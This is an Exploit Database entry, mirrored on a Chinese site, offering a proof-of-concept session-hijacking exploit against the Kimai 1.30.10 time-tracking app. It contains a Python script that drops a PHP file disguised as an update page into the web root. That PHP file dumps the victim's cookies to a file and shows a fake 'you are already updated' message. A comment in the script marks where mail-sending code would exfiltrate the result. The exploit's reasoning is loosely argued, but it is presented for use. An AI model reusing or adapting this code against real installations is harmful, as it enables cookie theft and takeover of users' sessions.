Kimai-1.30.10 – SameSite Cookie-Vulnerability session hijacking

• Exploit Database
• 143 阅读

• 作者： nu11secur1ty
  日期： 2023-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51278/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88

  ## Exploit Title: Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking ## Author: nu11secur1ty ## Date: 02.23.2023 ## Vendor: https://www.kimai.org/ ## Software: https://github.com/kimai/kimai/releases/tag/1.30.10 ## Reference: https://www.thesslstore.com/blog/the-ultimate-guide-to-session-hijacking-aka-cookie-hijacking/ ## Reference: https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions   ## Description: The Kimai-1.30.10 is vulnerable to SameSite-Cookie-Vulnerability-session-hijacking. The attacker can trick the victim to update or upgrade the system, by using a very malicious exploit to steal his vulnerable cookie and get control of his session.   STATUS: HIGH Vulnerability   [+]Exploit: ## WARNING: The EXPLOIT IS FOR ADVANCED USERS! This is only one example: </code><code>python #!/usr/bin/python import os import webbrowser import time   webbrowser.open(&apos;https://pwnedhost.com/kimai-1.30.10/public/en/login&apos;) input("After you log in please press any key to continue...") os.system("copy Update.php C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\") time.sleep(3) webbrowser.open(&apos;https://pwnedhost.com/kimai-1.30.10/public/Update.php&apos;) time.sleep(3) os.system("copy C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt C:\\Users\\venvaropt\\Desktop\\Kimai-1.30.10\\PoC\\") # Your mail-sending code must be here ;) time.sleep(7) os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\PoC.txt") os.system("del C:\\xampp\\htdocs\\pwnedhost\\kimai-1.30.10\\public\\Update.php")   </code><code> ----------------------------------------- </code><code>PHP <?php //echo &apos;<pre>&apos;; // print_r( $_COOKIE ); //die();   $fp = fopen(&apos;PoC.txt&apos;, &apos;w&apos;); fwrite($fp, print_r($_COOKIE, TRUE)); fclose($fp); echo "DONE: Now you are already updated! Enjoy your system Kimai 1.30.10 stable (Ayumi)"; ?> </code><code> ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kimai/2023/Kimai-1.30.10)   ## Proof and Exploit: [href](https://streamable.com/md9fmr)   ## Time spend: 03:00:00     -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>     -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>